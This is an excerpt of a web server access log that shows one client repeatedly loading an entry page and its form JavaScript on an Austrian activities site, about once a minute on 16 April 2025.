77.119.167.53 - - [16/Apr/2025:11:20:22 +0200] "GET /entry.php?id=10271&&ser=795161 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=795100" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:22 +0200] "GET /gui/javascript/form_form.js?1744795222 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795161" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:21:22 +0200] "GET /entry.php?id=10271&&ser=795222 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=795161" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:21:22 +0200] "GET /gui/javascript/form_form.js?1744795282 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795222" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:22:23 +0200] "GET /entry.php?id=10271&&ser=795282 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=795222" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:22:23 +0200] "GET /gui/javascript/form_form.js?1744795343 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795282" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:23:23 +0200] "GET /entry.php?id=10271&&ser=795343 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=795282" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:23:23 +0200] "GET /gui/javascript/form_form.js?1744795403 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795343" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
